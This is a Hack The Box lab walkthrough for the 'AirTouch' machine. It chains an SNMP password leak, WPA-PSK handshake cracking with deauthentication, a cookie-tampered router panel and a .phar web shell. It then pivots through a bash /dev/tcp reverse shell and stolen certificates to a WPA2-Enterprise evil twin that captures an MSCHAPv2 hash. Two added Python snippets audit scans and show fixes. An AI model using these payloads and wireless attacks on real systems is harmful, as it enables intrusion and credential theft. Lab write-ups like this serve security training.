Hack The Box / LINUX / 2026-04-18
Hack The Box — AirTouch (Linux)
SNMP leaks initial credentials, pivot through PSK Wi-Fi and router web upload RCE, certificate theft enables WPA2-Enterprise evil twin credential capture, and chained lateral movement reaches final root access.
Target
- IP: 10.129.244.98
Recon
sudo nmap -sC -sV 10.129.244.98 -p- -v
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 bd:90:00:15:cf:4b:da:cb:c9:24:05:2b:01:ac:dc:3b (RSA)
| 256 6e:e2:44:70:3c:6b:00:57:16:66:2f:37:58:be:f5:c0 (ECDSA)
|_ 256 ad:d5:d5:f0:0b:af:b2:11:67:5b:07:5c:8e:85:76:76 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
sudo nmap -sU 10.129.244.98 -p- -v --min-rate 5000
PORT STATE SERVICE
161/udp open snmp
sudo nmap -sC -sV -sU 10.129.244.98 -p161
PORT STATE SERVICE VERSION
161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-info:
| enterprise: net-snmp
| engineIDFormat: unknown
| engineIDData: 6018b539cfdf6f6900000000
| snmpEngineBoots: 1
|_ snmpEngineTime: 9m16s
| snmp-sysdescr: "The default consultant password is: RxBlZhLmOkacNWScmZ6D (change it after use it)"
|_ System uptime: 9m16.11s (55611 timeticks)
Service Info: Host: Consultant
snmp-check 10.129.244.98 -p 161 -c public
Host IP address : 10.129.244.98
Hostname : Consultant
Description : "The default consultant password is: RxBlZhLmOkacNWScmZ6D (change it after use it)"
Contact : admin@AirTouch.htb
Location : "Consultant pc"
Uptime snmp : 00:10:49.62
Uptime system : 00:09:45.75
System date : -
Initial Access (consultant)
ssh consultant@10.129.244.98
Enter password RxBlZhLmOkacNWScmZ6D.
In consultant's home directory there are two files, diagram-net.png and photo_2023-03-01_22-04-52.png, containing a network diagram.
sudo -l
Matching Defaults entries for consultant on AirTouch-Consultant:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User consultant may run the following commands on AirTouch-Consultant:
(ALL) NOPASSWD: ALL
sudo -i
We get a root shell.
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0@if29: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether fe:c2:54:6c:91:32 brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet 172.20.1.2/24 brd 172.20.1.255 scope global eth0
valid_lft forever preferred_lft forever
7: wlan0: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000
link/ether 02:00:00:00:00:00 brd ff:ff:ff:ff:ff:ff
8: wlan1: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000
link/ether 02:00:00:00:01:00 brd ff:ff:ff:ff:ff:ff
9: wlan2: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000
link/ether 02:00:00:00:02:00 brd ff:ff:ff:ff:ff:ff
10: wlan3: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000
link/ether 02:00:00:00:03:00 brd ff:ff:ff:ff:ff:ff
11: wlan4: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000
link/ether 02:00:00:00:04:00 brd ff:ff:ff:ff:ff:ff
12: wlan5: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000
link/ether 02:00:00:00:05:00 brd ff:ff:ff:ff:ff:ff
13: wlan6: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000
link/ether 02:00:00:00:06:00 brd ff:ff:ff:ff:ff:ff
There are several Wi-Fi interfaces.
Useful site: https://book.hacktricks.xyz/generic-methodologies-and-resources/pentesting-wifi
Wi-Fi Enumeration
ifconfig wlan0 up
iw dev wlan0 scan
BSS c2:a2:82:8a:11:97(on wlan0)
last seen: 1357.256s [boottime]
TSF: 1768940764881815 usec (20473d, 20:26:04)
freq: 2412
beacon interval: 100 TUs
capability: ESS Privacy ShortSlotTime (0x0411)
signal: -30.00 dBm
last seen: 0 ms ago
Information elements from Probe Response frame:
SSID: vodafoneFB6N
Supported rates: 1.0* 2.0* 5.5* 11.0* 6.0 9.0 12.0 18.0
DS Parameter set: channel 1
ERP: Barker_Preamble_Mode
Extended supported rates: 24.0 36.0 48.0 54.0
RSN: * Version: 1
* Group cipher: TKIP
* Pairwise ciphers: TKIP
* Authentication suites: PSK
* Capabilities: 1-PTKSA-RC 1-GTKSA-RC (0x0000)
Extended capabilities:
* Extended Channel Switching
* Multiple BSSID
* SSID List
* Operating Mode Notification
BSS 6a:55:8e:3c:64:bb(on wlan0)
last seen: 1357.384s [boottime]
TSF: 1768940765009892 usec (20473d, 20:26:05)
freq: 2422
beacon interval: 100 TUs
capability: ESS Privacy ShortSlotTime (0x0411)
signal: -30.00 dBm
last seen: 0 ms ago
Information elements from Probe Response frame:
SSID: MOVISTAR_FG68
Supported rates: 1.0* 2.0* 5.5* 11.0* 6.0 9.0 12.0 18.0
DS Parameter set: channel 3
ERP: Barker_Preamble_Mode
Extended supported rates: 24.0 36.0 48.0 54.0
RSN: * Version: 1
* Group cipher: TKIP
* Pairwise ciphers: CCMP TKIP
* Authentication suites: PSK
* Capabilities: 1-PTKSA-RC 1-GTKSA-RC (0x0000)
Extended capabilities:
* Extended Channel Switching
* Multiple BSSID
* SSID List
* Operating Mode Notification
BSS d6:0b:fc:9a:c4:f5(on wlan0)
last seen: 1357.576s [boottime]
TSF: 1768940765201824 usec (20473d, 20:26:05)
freq: 2437
beacon interval: 100 TUs
capability: ESS Privacy ShortSlotTime (0x0411)
signal: -30.00 dBm
last seen: 0 ms ago
Information elements from Probe Response frame:
SSID: WIFI-JOHN
Supported rates: 1.0* 2.0* 5.5* 11.0* 6.0 9.0 12.0 18.0
DS Parameter set: channel 6
ERP: Barker_Preamble_Mode
Extended supported rates: 24.0 36.0 48.0 54.0
RSN: * Version: 1
* Group cipher: TKIP
* Pairwise ciphers: CCMP TKIP
* Authentication suites: PSK
* Capabilities: 1-PTKSA-RC 1-GTKSA-RC (0x0000)
Extended capabilities:
* Extended Channel Switching
* Multiple BSSID
* SSID List
* Operating Mode Notification
BSS f0:9f:c2:a3:f1:a7(on wlan0)
last seen: 1357.576s [boottime]
TSF: 1768940765201844 usec (20473d, 20:26:05)
freq: 2437
beacon interval: 100 TUs
capability: ESS Privacy ShortSlotTime (0x0411)
signal: -30.00 dBm
last seen: 0 ms ago
Information elements from Probe Response frame:
SSID: AirTouch-Internet
Supported rates: 1.0* 2.0* 5.5* 11.0* 6.0 9.0 12.0 18.0
DS Parameter set: channel 6
ERP: Barker_Preamble_Mode
Extended supported rates: 24.0 36.0 48.0 54.0
RSN: * Version: 1
* Group cipher: TKIP
* Pairwise ciphers: CCMP TKIP
* Authentication suites: PSK
* Capabilities: 1-PTKSA-RC 1-GTKSA-RC (0x0000)
Extended capabilities:
* Extended Channel Switching
* Multiple BSSID
* SSID List
* Operating Mode Notification
BSS 2e:c2:ba:37:81:12(on wlan0)
last seen: 1357.768s [boottime]
TSF: 1768940765393777 usec (20473d, 20:26:05)
freq: 2452
beacon interval: 100 TUs
capability: ESS Privacy ShortSlotTime (0x0411)
signal: -30.00 dBm
last seen: 0 ms ago
Information elements from Probe Response frame:
SSID: MiFibra-24-D4VY
Supported rates: 1.0* 2.0* 5.5* 11.0* 6.0 9.0 12.0 18.0
DS Parameter set: channel 9
ERP: Barker_Preamble_Mode
Extended supported rates: 24.0 36.0 48.0 54.0
RSN: * Version: 1
* Group cipher: CCMP
* Pairwise ciphers: CCMP
* Authentication suites: PSK
* Capabilities: 1-PTKSA-RC 1-GTKSA-RC (0x0000)
Extended capabilities:
* Extended Channel Switching
* Multiple BSSID
* SSID List
* Operating Mode Notification
BSS ac:8b:a9:f3:a1:13(on wlan0)
last seen: 1358.216s [boottime]
TSF: 1768940765841659 usec (20473d, 20:26:05)
freq: 5220
beacon interval: 100 TUs
capability: ESS Privacy (0x0011)
signal: -30.00 dBm
last seen: 0 ms ago
Information elements from Probe Response frame:
SSID: AirTouch-Office
Supported rates: 6.0* 9.0 12.0* 18.0 24.0* 36.0 48.0 54.0
DS Parameter set: channel 44
Country: ES Environment: Indoor/Outdoor
Channels [36 - 48] @ 23 dBm
Channels [149 - 169] @ 13 dBm
RSN: * Version: 1
* Group cipher: CCMP
* Pairwise ciphers: CCMP
* Authentication suites: IEEE 802.1X
* Capabilities: 16-PTKSA-RC 1-GTKSA-RC (0x000c)
Extended capabilities:
* Extended Channel Switching
* Multiple BSSID
* SSID List
* Operating Mode Notification
WMM: * Parameter version 1
* BE: CW 15-1023, AIFSN 3
* BK: CW 127-32767, AIFSN 7
* VI: CW 32767-32767, AIFSN 3, TXOP 3008 usec
* VO: CW 32767-32767, AIFSN 7, TXOP 1504 usec
BSS ac:8b:a9:aa:3f:d2(on wlan0)
last seen: 1358.216s [boottime]
TSF: 1768940765841728 usec (20473d, 20:26:05)
freq: 5220
beacon interval: 100 TUs
capability: ESS Privacy (0x0011)
signal: -30.00 dBm
last seen: 0 ms ago
Information elements from Probe Response frame:
SSID: AirTouch-Office
Supported rates: 6.0* 9.0 12.0* 18.0 24.0* 36.0 48.0 54.0
DS Parameter set: channel 44
Country: ES Environment: Indoor/Outdoor
Channels [36 - 48] @ 23 dBm
Channels [149 - 169] @ 13 dBm
RSN: * Version: 1
* Group cipher: CCMP
* Pairwise ciphers: CCMP
* Authentication suites: IEEE 802.1X
* Capabilities: 16-PTKSA-RC 1-GTKSA-RC (0x000c)
Extended capabilities:
* Extended Channel Switching
* Multiple BSSID
* SSID List
* Operating Mode Notification
WMM: * Parameter version 1
* BE: CW 15-1023, AIFSN 3
* BK: CW 127-32767, AIFSN 7
* VI: CW 32767-32767, AIFSN 3, TXOP 3008 usec
* VO: CW 32767-32767, AIFSN 7, TXOP 1504 usec
Set wlan0 to monitor mode:
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
iwconfig wlan0
wlan0 IEEE 802.11 Mode:Monitor Frequency:2.412 GHz Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:on
Use airodump-ng to capture Wi-Fi packets on 2.4 and 5 GHz:
airodump-ng --band abg wlan0
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
AC:8B:A9:F3:A1:13 -28 94 0 0 44 54e WPA2 CCMP MGT AirTouch-Office
AC:8B:A9:AA:3F:D2 -28 94 7 0 44 54e WPA2 CCMP MGT AirTouch-Office
F0:9F:C2:A3:F1:A7 -28 47 0 0 6 54 CCMP PSK AirTouch-Internet
D6:0B:FC:9A:C4:F5 -28 47 0 0 6 54 CCMP PSK WIFI-JOHN
2E:C2:BA:37:81:12 -28 46 0 0 9 54 WPA2 CCMP PSK MiFibra-24-D4VY
6A:55:8E:3C:64:BB -28 92 0 0 3 54 CCMP PSK MOVISTAR_FG68
C2:A2:82:8A:11:97 -28 2806 0 0 1 54 TKIP PSK vodafoneFB6N
BSSID STATION PWR Rate Lost Frames Notes Probes
AC:8B:A9:AA:3F:D2 C8:8A:9A:6F:F9:D2 -29 0 - 6e 0 34 AccessLink,AirTouch-Office
AC:8B:A9:AA:3F:D2 28:6C:07:12:EE:F3 -29 0 -24e 0 22 AirTouch-Office
AC:8B:A9:AA:3F:D2 28:6C:07:12:EE:A1 -29 0 -36e 0 15 AirTouch-Office
Several stations are associated with, or probing for, AirTouch-Office.
After waiting a bit longer, we also see traffic exchanged with the AP AirTouch-Internet.
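A defender can script the same read of this scan. The following is an added example, not part of the original writeup: it parses `iw dev <iface> scan` output in the format shown above and flags TKIP, shared-passphrase (PSK) networks and SSIDs advertised by more than one BSSID. The embedded scan is a constructed excerpt of the output above and the finding codes are my own.

```python
import re
from dataclasses import dataclass, field

# Constructed excerpt of the `iw dev wlan0 scan` output shown above.
# Indentation is stripped by the parser, so the flattened copy on
# this page parses the same way as real iw output.
SAMPLE_SCAN = """\
BSS f0:9f:c2:a3:f1:a7(on wlan0)
SSID: AirTouch-Internet
RSN: * Version: 1
* Group cipher: TKIP
* Pairwise ciphers: CCMP TKIP
* Authentication suites: PSK
BSS ac:8b:a9:f3:a1:13(on wlan0)
SSID: AirTouch-Office
RSN: * Version: 1
* Group cipher: CCMP
* Pairwise ciphers: CCMP
* Authentication suites: IEEE 802.1X
BSS ac:8b:a9:aa:3f:d2(on wlan0)
SSID: AirTouch-Office
RSN: * Version: 1
* Group cipher: CCMP
* Pairwise ciphers: CCMP
* Authentication suites: IEEE 802.1X
"""

# Finding codes (my own) and what to do about each one.
DESCRIPTIONS = {
    "TKIP": "TKIP offered: deprecated RC4-based cipher, disable it and allow CCMP only",
    "PSK": "WPA2-Personal: one shared passphrase; a captured 4-way handshake is "
           "brute-forceable offline, use a long random passphrase or 802.1X/WPA3-SAE",
    "MULTI_BSSID": "SSID advertised by several BSSIDs: confirm each one is a managed AP "
                   "(an evil twin appears as an extra or duplicated BSSID)",
}


@dataclass
class Bss:
    bssid: str
    ssid: str = ""
    group_cipher: str = ""
    pairwise: list = field(default_factory=list)
    akm: str = ""          # e.g. "PSK" or "IEEE 802.1X"


def parse_iw_scan(text):
    """Parse `iw dev <iface> scan` output into Bss records, one per 'BSS ...' header."""
    networks, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        m = re.match(r"BSS ([0-9a-f]{2}(?::[0-9a-f]{2}){5})", line, re.I)
        if m:
            cur = Bss(bssid=m.group(1).lower())
            networks.append(cur)
        elif cur is None:
            continue                      # text before the first BSS header
        elif line.startswith("SSID:"):
            cur.ssid = line.partition(":")[2].strip()
        elif "Group cipher:" in line:
            cur.group_cipher = line.partition("Group cipher:")[2].strip()
        elif "Pairwise ciphers:" in line:
            cur.pairwise = line.partition("Pairwise ciphers:")[2].split()
        elif "Authentication suites:" in line:
            cur.akm = line.partition("Authentication suites:")[2].strip()
    return networks


def assess(networks):
    """Map each BSSID to its list of finding codes (see DESCRIPTIONS)."""
    bssids_per_ssid = {}
    for n in networks:
        bssids_per_ssid.setdefault(n.ssid, set()).add(n.bssid)
    findings = {}
    for n in networks:
        codes = []
        if n.group_cipher == "TKIP" or "TKIP" in n.pairwise:
            codes.append("TKIP")
        if n.akm == "PSK":
            codes.append("PSK")
        if len(bssids_per_ssid[n.ssid]) > 1:
            codes.append("MULTI_BSSID")
        findings[n.bssid] = codes
    return findings


if __name__ == "__main__":
    for bssid, codes in assess(parse_iw_scan(SAMPLE_SCAN)).items():
        for code in codes:
            print(f"{bssid}: {DESCRIPTIONS[code]}")
```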
Capture and Crack WPA-PSK (AirTouch-Internet)
In one shell:
airodump-ng -c 6 --bssid F0:9F:C2:A3:F1:A7 -w airtouch_capture wlan0
In another shell, send deauth packets to clients connected to AirTouch-Internet:
aireplay-ng -0 10 -a F0:9F:C2:A3:F1:A7 wlan0
Packets are sent.
In the airodump terminal, top-right shows:
[ WPA handshake: F0:9F:C2:A3:F1:A7
So a handshake was captured.
Stop airodump-ng with CTRL+C.
airodump-ng created these files:
airtouch_capture-01.cap
airtouch_capture-01.csv
airtouch_capture-01.kismet.csv
airtouch_capture-01.kismet.netxml
airtouch_capture-01.log.csv
The interesting one is airtouch_capture-01.cap with captured packets.
We can crack the Wi-Fi password with aircrack-ng.
Notice /root/eaphammer/wordlists/rockyou.txt exists.
aircrack-ng airtouch_capture-01.cap -w /root/eaphammer/wordlists/rockyou.txt
KEY FOUND! [ challenge ]
Recovered password is challenge.
Connect to AirTouch-Internet
Generate config:
wpa_passphrase "AirTouch-Internet" "challenge" > wpa.conf
Use wpa_supplicant to connect:
ifconfig wlan1 up
wpa_supplicant -B -i wlan1 -c wpa.conf
Verify connection:
iw dev wlan1 link
Connected to f0:9f:c2:a3:f1:a7 (on wlan1)
SSID: AirTouch-Internet
freq: 2437
RX: 372035 bytes (6018 packets)
TX: 20372 bytes (594 packets)
signal: -30 dBm
rx bitrate: 1.0 MBit/s
tx bitrate: 54.0 MBit/s
bss flags: short-slot-time
dtim period: 2
beacon int: 100
Assign an IP address to the interface.
From diagram-net.png, there should be subnet 192.168.3.0/24.
Manual assignment:
ifconfig wlan1 192.168.3.51 netmask 255.255.255.0
Or automatic DHCP assignment:
dhclient -v wlan1
[...]
bound to 192.168.3.23 -- renewal in 40246 seconds.
Internal Router Enumeration
Download statically compiled nmap from
https://github.com/opsec-infosec/nmap-static-binaries/raw/refs/heads/master/linux/x86_64/nmap
and upload it to the victim machine.
Copy protocol/service files:
cp /usr/share/nmap/nmap-services .
cp /usr/share/nmap/nmap-protocols .
Upload them to the victim machine. On victim:
./nmap 192.168.3.0/24 -p- -v -T5
Nmap scan report for 192.168.3.1
Host is up (0.000023s latency).
Not shown: 65528 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
80/tcp open http
18917/tcp filtered unknown
24078/tcp filtered unknown
37826/tcp filtered unknown
64047/tcp filtered unknown
MAC Address: F0:9F:C2:A3:F1:A7 (Unknown)
This is the router.
Port 80 is open.
curl http://192.168.3.1 -L -v
We notice PSK Router Login and a username/password form.
Chisel Port Forward to Browse Router Panel
Download chisel: https://github.com/jpillora/chisel.
Upload chisel to victim.
On attacker:
./chisel server --reverse --port 9999
On victim:
./chisel client http://10.10.14.29:9999 R:127.0.0.1:80:192.168.3.1:80
Open browser at http://127.0.0.1.
We see the login form, but we do not know credentials.
Since the panel is served over plain HTTP (cleartext), we can capture the Wi-Fi traffic and try to recover the credentials from it.
Capture HTTP Credentials on AirTouch-Internet
Capture and save packets:
airodump-ng -c 6 --bssid F0:9F:C2:A3:F1:A7 -w mycapture wlan1
Now we need to trigger client deauthentication; use wlan0.
In one shell, set interface channel with airodump-ng:
airodump-ng -c 6 --band abg wlan0
In another shell, trigger deauth with aireplay-ng:
aireplay-ng -0 10 -a F0:9F:C2:A3:F1:A7 wlan0
Wait a bit.
Packets are captured.
Download file mycapture-01.cap to attacker machine.
Decrypt packets with airdecap-ng:
airdecap-ng -e 'AirTouch-Internet' -p challenge mycapture-01.cap
Total number of stations seen 1
Total number of packets read 5257
Total number of WEP data packets 0
Total number of WPA data packets 65
Number of plaintext data packets 0
Number of decrypted WEP packets 0
Number of corrupted WEP packets 0
Number of decrypted WPA packets 31
Number of bad TKIP (WPA) packets 0
Number of bad CCMP (WPA) packets 0
Some packets were decrypted and stored in mycapture-01-dec.cap.
Open it in Wireshark:
wireshark mycapture-01-dec.cap
Filter by HTTP.
We see a POST request to http://192.168.3.1/login.php sending credentials:
- Username: manager
- Password: 2wLFYNh4TSTgA5sNgT4
If not already done, forward port 80 with chisel.
In browser go to http://127.0.0.1/login.php.
Log in using recovered credentials.
We arrive at /index.php, but initially there seems to be little we can do.
In cookies, we notice cookie UserRole is set to user.
Change it to admin and reload page.
Now a configuration file upload form appears.
Try uploading shell.php with content:
<?php system($_GET["cmd"]); ?>
Output:
Sorry, PHP and HTML files are not allowed.Sorry, your file was not uploaded.
Rename the file to shell.phar and upload again.
This time output is:
The file shell.phar has been uploaded to folder uploads/
Go to:
http://127.0.0.1/uploads/shell.phar?cmd=id
Output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Go to:
http://127.0.0.1/uploads/shell.phar?cmd=cat%20../login.php
We notice:
/*'user' => array('password' => 'JunDRDZKHDnpkpDDvay', 'role' => 'admin'),*/
'manager' => array('password' => '2wLFYNh4TSTgA5sNgT4', 'role' => 'user')
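The two weaknesses just used, a role read from a cookie the browser can edit and an extension blocklist that misses .phar, look like this beside their server-side fixes. This is an added illustration in Python, not the router's PHP code; the allowed extensions and the session store are assumptions.

```python
import os
import secrets


# Vulnerable: the authorisation decision comes straight from a client-controlled
# cookie, which is why changing UserRole=user to admin above unlocked the upload form.
def role_from_cookie_vulnerable(cookies):
    return cookies.get("UserRole", "user")


# Fixed: the browser only holds an unguessable session id; the role lives in a
# server-side store the client cannot edit (the dict here is a constructed stand-in).
def create_session(sessions, username, role):
    token = secrets.token_urlsafe(32)
    sessions[token] = {"user": username, "role": role}
    return token


def role_from_session(cookies, sessions):
    sess = sessions.get(cookies.get("session_id", ""))
    return sess["role"] if sess else None


# Vulnerable upload filter as the panel's error message implies it: a blocklist.
# Any other extension the PHP handler executes (.phar, .phtml, ...) passes.
BLOCKED_EXTENSIONS = {".php", ".html"}


def upload_allowed_blocklist(filename):
    return os.path.splitext(filename)[1].lower() not in BLOCKED_EXTENSIONS


# Fixed upload filter: allow only what a "configuration file" form needs (assumed
# extensions), reject path components, and never reuse the client's file name.
# The upload directory should additionally be served with script execution off.
ALLOWED_EXTENSIONS = {".conf", ".cfg"}


def upload_allowed_allowlist(filename):
    base = os.path.basename(filename)
    if base != filename or ".." in filename:
        return False                      # directory traversal attempt
    root, ext = os.path.splitext(base)
    return bool(root) and ext.lower() in ALLOWED_EXTENSIONS


def stored_name(filename):
    """Random on-disk name with a vetted extension, so names like x.php.conf never land."""
    if not upload_allowed_allowlist(filename):
        raise ValueError("rejected upload: " + filename)
    return secrets.token_hex(8) + os.path.splitext(filename)[1].lower()
```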
We have RCE and can get a reverse shell.
Important: the attacker machine is not on this Wi-Fi network, so the shell cannot call back to it directly; instead, listen on the consultant machine, whose wlan1 address (192.168.3.23) is on the same subnet.
Start netcat listener:
nc -vlnp 4444
Go to:
http://127.0.0.1/uploads/shell.phar?cmd=bash%20%2Dc%20%27bash%20%2Di%20%3E%26%20%2Fdev%2Ftcp%2F192%2E168%2E3%2E23%2F4444%200%3E%261%27
Which corresponds to payload:
bash -c 'bash -i >& /dev/tcp/192.168.3.23/4444 0>&1'
We get a reverse shell. Upgrade to a full TTY:
python3 -c 'import pty;pty.spawn("/bin/bash")'
# CTRL+Z
stty raw -echo
fg
ls -la /home
We notice user user.
We can log in as user with password JunDRDZKHDnpkpDDvay found earlier in login.php.
su user
Enter password JunDRDZKHDnpkpDDvay.
sudo -l
Matching Defaults entries for user on AirTouch-AP-PSK:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User user may run the following commands on AirTouch-AP-PSK:
(ALL) NOPASSWD: ALL
Become root:
sudo -i
Credentials for Next Pivot (10.10.10.1)
In root folder there is file send_certs.sh:
cat send_certs.sh
#!/bin/bash
# DO NOT COPY
# Script to sync certs-backup folder to AirTouch-office.
# Define variables
REMOTE_USER="remote"
REMOTE_PASSWORD="xGgWEwqUpfoOVsLeROeG"
REMOTE_PATH="~/certs-backup/"
LOCAL_FOLDER="/root/certs-backup/"
# Use sshpass to send the folder via SCP
sshpass -p "$REMOTE_PASSWORD" scp -r "$LOCAL_FOLDER" "$REMOTE_USER@10.10.10.1:$REMOTE_PATH"
We found credentials for host 10.10.10.1:
remote / xGgWEwqUpfoOVsLeROeG
Also in /root there is folder certs-backup:
ls -la certs-backup/
total 40
drwxr-xr-x 2 root root 4096 Mar 27 2024 .
drwx------ 1 root root 4096 Feb 6 22:56 ..
-rw-r--r-- 1 root root 1124 Mar 27 2024 ca.conf
-rw-r--r-- 1 root root 1712 Mar 27 2024 ca.crt
-rw-r--r-- 1 root root 1111 Mar 27 2024 server.conf
-rw-r--r-- 1 root root 1493 Mar 27 2024 server.crt
-rw-r--r-- 1 root root 1033 Mar 27 2024 server.csr
-rw-r--r-- 1 root root 168 Mar 27 2024 server.ext
-rw-r--r-- 1 root root 1704 Mar 27 2024 server.key
Pack everything into tar:
tar cvf roba.tar certs-backup/
Download it to the consultant machine, for example with a Python HTTP server and wget.
Extract it, for example in /root:
tar xvf roba.tar
On the consultant machine, /root also contains eaphammer.
eaphammer is a tool that among other things supports evil twin attacks.
Useful references:
- https://tbhaxor.com/evil-twin-with-karma-attack-using-eaphammer/
- https://tbhaxor.com/steal-credentials-for-enterprise-wifi-networks/
From previous airodump-ng output we saw:
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
AC:8B:A9:F3:A1:13 -28 94 0 0 44 54e WPA2 CCMP MGT AirTouch-Office
AC:8B:A9:AA:3F:D2 -28 94 7 0 44 54e WPA2 CCMP MGT AirTouch-Office
BSSID STATION PWR Rate Lost Frames Notes Probes
AC:8B:A9:AA:3F:D2 C8:8A:9A:6F:F9:D2 -29 0 - 6e 0 34 AccessLink,AirTouch-Office
AC:8B:A9:AA:3F:D2 28:6C:07:12:EE:F3 -29 0 -24e 0 22 AirTouch-Office
AC:8B:A9:AA:3F:D2 28:6C:07:12:EE:A1 -29 0 -36e 0 15 AirTouch-Office
So there are two APs with ESSID AirTouch-Office using MGT auth, i.e. WPA2-Enterprise.
eaphammer has attacks for this exact network type.
We can impersonate one AP and capture credentials when clients connect to us instead of real APs.
cd eaphammer
First generate a certificate:
./eaphammer --cert-wizard
[?] Am I root?
[*] Checking for rootness...
[*] I AM ROOOOOOOOOOOOT
[*] Root privs confirmed! 8D
[*] Please enter two letter country code for certs (i.e. US, FR)
: US
[*] Please enter state or province for certs (i.e. Ontario, New Jersey)
: Ontario
[*] Please enter locale for certs (i.e. London, Hong Kong)
: London
[*] Please enter organization for certs (i.e. Evil Corp)
: Evil Corp
[*] Please enter org unit for certs (i.e. Hooman Resource Says)
: Hooman Resource Says
[*] Please enter email for certs (i.e. cyberz@h4x0r.lulz)
: cyberz@h4x0r.lulz
[*] Please enter common name (CN) for certs.
: evilcerts
[CW] Creating CA cert and key pair...
[CW] Complete!
[CW] Writing CA cert and key pair to disk...
[CW] New CA cert and private key written to: /root/eaphammer/certs/ca/evilcerts.pem
[CW] Complete!
[CW] Creating server private key...
[CW] Complete!
[CW] Using server private key to create CSR...
[CW] Complete!
[CW] Creating server cert using CSR and signing it with CA key...
[CW] Complete!
[CW] Writing server cert and key pair to disk...
[CW] Complete!
[CW] Activating full certificate chain...
[CW] Complete!
To capture handshakes with credentials, create a Wi-Fi network with the same SSID and wait for clients to connect.
From previous airodump-ng, AirTouch-Office uses channel 44.
Run attack on wlan0:
./eaphammer -i wlan0 --channel 44 --auth wpa-eap --essid AirTouch-Office --bssid AC:8B:A9:AA:3F:D2 --creds
We specified one of the AirTouch-Office AP BSSIDs.
[*] WPA handshakes will be saved to /root/eaphammer/loot/wpa_handshake_capture-2026-01-20-22-11-10-WXmo3Y9bQSyjElKOLh4xfUCQA3SsJbvM.hccapx
[...]
wlan0: STA c8:8a:9a:6f:f9:d2 IEEE 802.11: authenticated
wlan0: STA c8:8a:9a:6f:f9:d2 IEEE 802.11: Station tried to associate before authentication (aid=-1 flags=0x0)
wlan0: CTRL-EVENT-EAP-STARTED 28:6c:07:12:ee:a1
wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=1
wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=25
wlan0: CTRL-EVENT-EAP-RETRANSMIT c8:8a:9a:6f:f9:d2
wlan0: CTRL-EVENT-EAP-RETRANSMIT 28:6c:07:12:ee:a1
SSL: SSL3 alert: read (remote end reported an error):fatal:unknown CA
OpenSSL: openssl_handshake - SSL_connect error:14094418:SSL routines:ssl3_read_bytes:tlsv1 alert unknown ca
It looks like the client does not accept our certificate.
This is where certs and private keys from certs-backup are needed.
eaphammer keeps its certificates under the certs folder.
Remove existing ones:
rm -rf certs/active/*
rm -rf certs/ca/*
rm -rf certs/server/*
Now import discovered certificates:
./eaphammer --cert-wizard import --ca-cert ../certs-backup/ca.crt --private-key ../certs-backup/server.key --server-cert ../certs-backup/server.crt
[?] Am I root?
[*] Checking for rootness...
[*] I AM ROOOOOOOOOOOOT
[*] Root privs confirmed! 8D
Case 1: Import all separate
[CW] Ensuring server cert, CA cert, and private key are valid...
../certs-backup/server.crt
../certs-backup/server.key
../certs-backup/ca.crt
[CW] Complete!
[CW] Loading private key from ../certs-backup/server.key
[CW] Complete!
[CW] Loading server cert from ../certs-backup/server.crt
[CW] Complete!
[CW] Loading CA certificate chain from ../certs-backup/ca.crt
[CW] Complete!
[CW] Constructing full certificate chain with integrated key...
[CW] Complete!
[CW] Writing private key and full certificate chain to file...
[CW] Complete!
[CW] Private key and full certificate chain written to: /root/eaphammer/certs/server/AirTouch CA.pem
[CW] Activating full certificate chain...
[CW] Complete!
Certificates were imported. Run attack again:
./eaphammer -i wlan0 --channel 44 --auth wpa-eap --essid AirTouch-Office --bssid AC:8B:A9:F3:A1:13 --creds
Again, we need to deauthenticate clients from the original APs so they reconnect to ours.
Use interface wlan3, set channel 44:
airodump-ng -c 44 --band abg wlan3
Send deauth packets:
aireplay-ng -0 10 -a AC:8B:A9:F3:A1:13 wlan3
Wait. In eaphammer terminal we get:
mschapv2: Sat Feb 7 01:12:55 2026
domain\username: AirTouch\r4ulcl
username: r4ulcl
challenge: 91:ea:da:ab:b3:55:27:3d
response: 5e:4b:9f:5b:27:fb:1d:0a:54:91:73:1b:f8:d7:d9:17:dd:b7:b2:58:7a:da:7c:56
jtr NETNTLM: r4ulcl:$NETNTLM$91eadaabb355273d$5e4b9f5b27fb1d0a5491731bf8d7d917ddb7b2587ada7c56
hashcat NETNTLM: r4ulcl::::5e4b9f5b27fb1d0a5491731bf8d7d917ddb7b2587ada7c56:91eadaabb355273d
